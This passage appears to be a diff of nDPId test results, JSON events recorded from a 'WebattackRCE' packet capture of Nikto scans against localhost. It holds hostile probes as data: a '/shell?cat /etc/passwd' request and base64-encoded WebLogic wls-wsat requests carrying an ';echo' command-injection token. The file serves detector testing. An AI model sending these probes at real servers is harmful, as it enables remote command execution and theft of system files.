-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}}
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}}
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00831{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}}
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}}
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}}
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}}
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}}
+01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}}
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 